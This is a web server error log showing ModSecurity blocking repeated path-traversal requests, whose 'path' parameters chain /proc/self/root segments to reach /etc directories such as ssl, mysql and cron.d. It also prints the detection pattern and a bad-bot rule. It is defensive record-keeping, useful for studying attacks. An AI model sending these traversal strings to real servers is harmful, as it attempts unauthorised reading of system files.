[Tue Mar 17 09:53:21.584875 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.46:52302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOwQeiSKl8TjouI-YFUQAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:23.916808 2026] [:error] [pid 2159:tid 140411548894976] [client 74.7.243.203:59082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOw_ct6CQ8jnRyg2p-_wAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:27.703440 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:59094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOx6BJNF7axNlVR0X_8QAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:29.026471 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.243.203:59108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOyat8Nd0UC_OcbVGyKAAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:53:49.396803 2026] [:error] [pid 2159:tid 140411632822016] [client 74.7.241.46:52316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablO3fct6CQ8jnRyg2p_LwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:54.142666 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.241.46:46826] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablO4pqmL8PQht4WJFlLlQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:55.503625 2026] [:error] [pid 2159:tid 140411716749056] [client 74.7.241.46:46842] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablO4_ct6CQ8jnRyg2p_NwAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:54:03.239125 2026] [:error] [pid 1731:tid 140411691570944] [client 74.7.228.16:45456] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablO6wb2qCuy5irgBMjL_gAAAEY"]
[Tue Mar 17 09:54:05.435424 2026] [:error] [pid 2159:tid 140411540502272] [client 74.7.241.46:46842] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablO7fct6CQ8jnRyg2p_SwAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:54:10.465710 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.241.46:39650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablO8tCmCSWTlPouqorPBwAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:54:14.140077 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.241.46:38040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablO9u82sZHvlq4xgHrF6gAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:54:35.406123 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.46:38056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablPC6BJNF7axNlVR0UAEwAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:54:37.814937 2026] [:error] [pid 18257:tid 140411725141760] [client 74.7.241.46:56706] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablPDdrpm-qFp5fwuEQ_ZQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:54:38.105960 2026] [:error] [pid 1210:tid 140411540502272] [client 74.7.243.203:60550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablPDlKJy4A1bGlmj9BY8gAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:54:45.741060 2026] [:error] [pid 18709:tid 140411574073088] [client 74.7.241.46:47884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablPFTarLhPAjZGI1b2wngAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:55:10.431364 2026] [:error] [pid 1731:tid 140411632822016] [client 74.7.243.203:53454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablPLgb2qCuy5irgBMjMHwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:55:30.855990 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.241.46:59722] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablPQpDEJR9VXonE_-1StgAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:58:55.432992 2026] [:error] [pid 18604:tid 140411632822016] [client 74.7.244.31:38794] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablQD0Bd0UqwxWindINrNgAAA00"]
[Tue Mar 17 09:58:59.618090 2026] [:error] [pid 18604:tid 140411616036608] [client 74.7.241.46:37824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablQE0Bd0UqwxWindINrOQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:59:59.203284 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.241.46:40926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablQT5DEJR9VXonE_-1S3QAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:01:02.325640 2026] [:error] [pid 2553:tid 140411691570944] [client 74.7.241.46:57712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablQjv0Bec_B9OkZP_jAPQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:03:08.888073 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.46:47880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablRDAeiSKl8TjouI-YFvwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:04:04.512190 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.46:53022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablRRKBJNF7axNlVR0UAbgAAABU"], referer: 